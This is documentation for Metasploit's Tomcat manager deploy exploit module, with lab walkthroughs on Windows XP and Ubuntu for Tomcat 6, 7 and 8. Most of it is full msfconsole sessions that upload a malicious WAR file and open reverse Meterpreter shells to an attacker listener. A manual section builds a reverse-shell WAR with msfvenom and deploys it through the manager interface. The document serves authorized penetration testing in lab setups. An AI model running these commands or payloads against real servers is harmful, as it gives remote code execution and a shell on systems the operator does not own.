metasploit-gs/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md

Documentation Format

This documentation is slightly different from the standard module documentation due to the variation in variables/privileges/versions that can affect how exploitation happens. This documentation is broken down by OS, Tomcat version, then privilege to show exploitation at each way.

Cleanup

It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat. This must be done manually.

Windows (xp sp2)

Tomcat 6 (6.0.48)

Setup

1. Download and install the pre-req Java7
2. Download and install Tomcat6

The install was default, other than adding a user during install. No other options were changed. The install assgined the new user the role manager-gui, which is Tomcat 7+ syntax. For this exploitation, it was changed to simply manager

text/script Interface

1. Edit C:\Program Files\Apache Software Foundation\Tomcat 6.0\tomcat-users.xml to add the following under the <tomcat-users> line:

   <role rolename="manager"/>
   <user username="tomcat" password="tomcat" roles="manager"/>
   

2. Restart Tomcat service

3. Exploit:

   msf > use exploit/multi/http/tomcat_mgr_deploy 
   msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
   rhost => 192.168.2.108
   msf exploit(tomcat_mgr_deploy) > set verbose true
   verbose => true
   msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
   HttpPassword => tomcat
   msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
   HttpUsername => tomcat
   msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
   lhost => 192.168.2.117
   msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp 
   payload => java/meterpreter/reverse_tcp
   msf exploit(tomcat_mgr_deploy) > set target 1
   target => 1
   msf exploit(tomcat_mgr_deploy) > set rport 8086
   rport => 8086
   msf exploit(tomcat_mgr_deploy) > set path /manager
   path => /manager
   msf exploit(tomcat_mgr_deploy) > exploit
   
   [*] Started reverse TCP handler on 192.168.2.117:4444 
   [*] Using manually select target "Java Universal"
   [*] Uploading 6071 bytes as scEYoK0.war ...
   [!] No active DB -- Credential data will not be saved!
   [*] Executing /scEYoK0/jgj6tWcImjhc7rH2F4TDjCpXG.jsp...
   [*] Undeploying scEYoK0 ...
   [*] Sending stage (49409 bytes) to 192.168.2.108
   [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1663) at 2017-01-14 14:30:52 -0500
   
   meterpreter > sysinfo
   Computer    : winxp
   OS          : Windows XP 5.1 (x86)
   Meterpreter : java/windows
   
   

Tomcat 7 (7.0.73)

Setup

1. Download and install the pre-req Java7
2. Download and install Tomcat7

The install was default, other than adding a user during install. No other options were changed. Of note, while the user was given manager-gui permissions, they didn't actually define that role. So the /manager/html page was visible, but deploying from there wasn't possible.

text/script Interface

1. Edit C:\Program Files\Apache Software Foundation\Tomcat 7.0\tomcat-users.xml to add the following under the <tomcat-users> line:

   <role rolename="manager-script"/>
   <user username="tomcat" password="tomcat" roles="manager-script"/>
   

2. Restart the service

3. Exploitation:

   msf > use exploit/multi/http/tomcat_mgr_deploy 
   msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
   rhost => 192.168.2.108
   msf exploit(tomcat_mgr_deploy) > set path /manager/text
   path => /manager/text
   msf exploit(tomcat_mgr_deploy) > set verbose true
   verbose => true
   msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
   HttpPassword => tomcat
   msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
   HttpUsername => tomcat
   msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
   lhost => 192.168.2.117
   msf exploit(tomcat_mgr_deploy) > set rport 8087
   rport => 8087
   msf exploit(tomcat_mgr_deploy) > set payload java/
   set payload java/meterpreter/bind_tcp       set payload java/meterpreter/reverse_tcp    set payload java/shell_reverse_tcp
   set payload java/meterpreter/reverse_http   set payload java/shell/bind_tcp             
   set payload java/meterpreter/reverse_https  set payload java/shell/reverse_tcp          
   msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp 
   payload => java/meterpreter/reverse_tcp
   msf exploit(tomcat_mgr_deploy) > set target 1
   target => 1
   msf exploit(tomcat_mgr_deploy) > exploit
   
   [*] Started reverse TCP handler on 192.168.2.117:4444 
   [*] Using manually select target "Java Universal"
   [*] Uploading 6086 bytes as Cl6t6gurtwIO59zV3Lt6.war ...
   [!] No active DB -- Credential data will not be saved!
   [*] Executing /Cl6t6gurtwIO59zV3Lt6/qTIP.jsp...
   [*] Undeploying Cl6t6gurtwIO59zV3Lt6 ...
   [*] Sending stage (49409 bytes) to 192.168.2.108
   [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1656) at 2017-01-14 14:27:21 -0500
   
   meterpreter > sysinfo
   Computer    : winxp
   OS          : Windows XP 5.1 (x86)
   Meterpreter : java/windows
   

Tomcat 8 (8.0.39)

Setup

1. Download and install the pre-req Java7
2. Download and install Tomcat8

The install was default, other than adding a user during install. No other options were changed. Of note, while the user was given manager-gui permissions, they didn't actually define that role. So the /manager/html page was visible, but deploying from there wasn't possible.

text/script interface

1. Edit C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml to add the following under the <tomcat-users line:

   <role rolename="manager-script"/>
   <user username="tomcat" password="tomcat" roles="manager-script"/>
   

2. Restart the service

3. Exploitation:

   msf > use exploit/multi/http/tomcat_mgr_deploy 
   msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
   rhost => 192.168.2.108
   msf exploit(tomcat_mgr_deploy) > set rport 8088
   rport => 8088
   msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp 
   payload => java/meterpreter/reverse_tcp
   msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
   lhost => 192.168.2.117
   msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
   HttpPassword => tomcat
   msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
   HttpUsername => tomcat
   msf exploit(tomcat_mgr_deploy) > set target 1
   target => 1
   msf exploit(tomcat_mgr_deploy) > exploit
   msf exploit(tomcat_mgr_deploy) > set path /manager/text
   path => /manager/text
   msf exploit(tomcat_mgr_deploy) > exploit
   
   [*] Started reverse TCP handler on 192.168.2.117:4444 
   [*] Using manually select target "Java Universal"
   [*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ...
   [*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp...
   [*] Undeploying c6TYmkd8YAe8LqKQhSCr ...
   [*] Sending stage (49409 bytes) to 192.168.2.108
   [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500
   
   meterpreter > sysinfo
   Computer    : winxp
   OS          : Windows XP 5.1 (x86)
   Meterpreter : java/windows
   

Linux

Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit

Setup

1. Install Tomcat and dependencies: sudo apt-get install tomcat6 tomcat6-admin

Exploit

1. Edit /etc/tomcat6/tomcat-users.xml to add the following:

<role rolename="manager"/>
<user username="tomcat" password="tomcat" roles="manager"/>

2. Restart Tomcat: sudo service tomcat6 restart

3. Exploit:

   msf > use exploit/multi/http/tomcat_mgr_deploy 
   msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156
   rhost => 192.168.2.156
   msf exploit(tomcat_mgr_deploy) > set rport 8080
   rport => 8080
   msf exploit(tomcat_mgr_deploy) > set verbose true
   verbose => true
   msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
   HttpUsername => tomcat
   msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
   HttpPassword => tomcat
   msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
   payload => linux/x86/mettle/reverse_tcp
   msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
   lhost => 192.168.2.117
   msf exploit(tomcat_mgr_deploy) > set target 3
   target => 3
   msf exploit(tomcat_mgr_deploy) > exploit
   
   [*] Started reverse TCP handler on 192.168.2.117:4444 
   [*] Using manually select target "Linux x86"
   [*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ...
   [!] No active DB -- Credential data will not be saved!
   [*] Executing /9bj4IYa66cSpdK/g3Yxbv3.jsp...
   [*] Transmitting intermediate stager...(106 bytes)
   [*] Sending stage (335800 bytes) to 192.168.2.156
   [*] Undeploying 9bj4IYa66cSpdK ...
   [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500
   
   meterpreter > sysinfo
   Computer     : Ubuntu14.04
   OS           : Ubuntu 14.04 (Linux 4.2.0-27-generic)
   Architecture : x64
   Meterpreter  : x86/linux
   

Tomcat7 (7.0.68) - Ubuntu server 16.04 64bit

Of note, as of Tomcat 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which path variable for exploitation.

Setup

1. Install Tomcat and dependencies: apt-get install tomcat7 tomcat7-admin

text/script interface

1. Edit /etc/tomcat7/tomcat-users.xml to add:

   <role rolename="manager-script"/>
   <user username="tomcat" password="tomcat" roles="manager-script"/>
   

2. Restart Tomcat: sudo service tomcat7 restart

3. To verify the permissions are all set correctly, browse to http://192.168.2.118:8087/manager/text/deploy, and you should see FAIL - Invalid parameters supplied for command [/deploy] as opposed to 403 Access Denied

4. Exploit:

   msf > use exploit/multi/http/tomcat_mgr_deploy 
   msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
   rhost => 192.168.2.118
   msf exploit(tomcat_mgr_deploy) > set rport 8087
   rport => 8087
   msf exploit(tomcat_mgr_deploy) > set target 3
   target => 3
   msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
   payload => linux/x86/mettle/reverse_tcp
   msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
   lhost => 192.168.2.117
   msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
   HttpUsername => tomcat
   msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
   HttpPassword => tomcat
   msf exploit(tomcat_mgr_deploy) > set verbose true
   verbose => true
   msf exploit(tomcat_mgr_deploy) > exploit
   msf exploit(tomcat_mgr_deploy) > set path /manager/text
   path => /manager/text
   msf exploit(tomcat_mgr_deploy) > exploit
   
   [*] Started reverse TCP handler on 192.168.2.117:4444 
   [*] Using manually select target "Linux x86"
   [*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ...
   [!] No active DB -- Credential data will not be saved!
   [*] Executing /9QymzSGGU0H4e/Mfz7dGecAsKTjSxfZgBv.jsp...
   [*] Undeploying 9QymzSGGU0H4e ...
   [*] Transmitting intermediate stager...(106 bytes)
   [*] Sending stage (335800 bytes) to 192.168.2.118
   [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500
   
   meterpreter > sysinfo
   Computer     : 192.168.2.118
   OS           : Ubuntu 16.04 (Linux 4.4.0-21-generic)
   Architecture : x64
   Meterpreter  : x86/linux
   

gui interface

Attempted to get the the GUI one to work, I wasn't able to. I believe you need to set the permission manager-gui, and possibly alter PATH to /manager/html. However, my attempts were unsuccessful.

Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit

Of note, as of 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which path variable for exploitation.

Setup

1. apt-get install tomcat8 tomcat8-admin

text/script interface

1. Edit /etc/tomcat8/tomcat-users.xml to add:

<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>

2. Restart tomcat: sudo service tomcat8 restart
3. To verify the permissions are all set correctly, browse to http://192.168.2.118:8087/manager/text/deploy, and you should see FAIL - Invalid parameters supplied for command [/deploy] as opposed to 403 Access Denied
4. Exploit:

   msf > use exploit/multi/http/tomcat_mgr_deploy 
   msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
   rhost => 192.168.2.118
   msf exploit(tomcat_mgr_deploy) > set rport 8088
   rport => 8088
   msf exploit(tomcat_mgr_deploy) > set target 3
   target => 3
   msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
   payload => linux/x86/mettle/reverse_tcp
   msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
   lhost => 192.168.2.117
   msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
   HttpUsername => tomcat
   msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
   HttpPassword => tomcat
   msf exploit(tomcat_mgr_deploy) > set verbose true
   verbose => true
   msf exploit(tomcat_mgr_deploy) > set path /manager/text
   path => /manager/text
   msf exploit(tomcat_mgr_deploy) > exploit
   
   [*] Started reverse TCP handler on 192.168.2.117:4444 
   [*] Using manually select target "Linux x86"
   [*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ...
   [!] No active DB -- Credential data will not be saved!
   [*] Executing /9s0fTUyPa2HJCDnod2wEQJ/ndAfDrUY.jsp...
   [*] Undeploying 9s0fTUyPa2HJCDnod2wEQJ ...
   [*] Transmitting intermediate stager...(106 bytes)
   [*] Sending stage (335800 bytes) to 192.168.2.118
   [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500
   
   meterpreter > sysinfo
   Computer     : 192.168.2.118
   OS           : Ubuntu 16.04 (Linux 4.4.0-59-generic)
   Architecture : x64
   Meterpreter  : x86/linux
   

gui interface

Attempted to get the the GUI one to work, I wasn't able to. I believe you need to set the permission manager-gui, and possibly alter PATH to /manager/html. However, my attempts were unsuccessful.

Manual Exploitation

Create payload

This was performed on Windows XP with the following permissions as the user that was used to login: Tomcat 6.0.48: manager Tomcat 7.0.73: manager-gui Tomcat 8.0.39: manager-gui

/metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war
Payload size: 6072 bytes
Final size of war file: 6072 bytes
Saved as: meterp.war

Setup Handler

msf > use exploit/multi/handler 
msf exploit(handler) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(handler) > set lport 7777
lport => 7777
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.2.117:7777 
[*] Starting the payload handler...

Deploy

1. With a web browser, browse to http://<ip>:<port>/manager/html
2. Enter credentials (no default)
3. Under Deploy > WAR file to deploy, click browse to select meterp.war, click Deploy
4. meterp should now be listed under Applications, meaning it was successfully deployed.
5. Either click the link for /meterp or browse to http://<ip>:<port>/meterp/

Callback

After browsing to that page, code execution will happen, and your callback will hit.

[*] Starting the payload handler...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:7777 -> 192.168.2.108:1704) at 2017-01-14 14:53:37 -0500

meterpreter > sysinfo
Computer    : winxp
OS          : Windows XP 5.1 (x86)
Meterpreter : java/windows

Cleanup

This will NOT remove the meterpreter from Tomcat, click Undeploy within the Application list to remove meterp from Tomcat.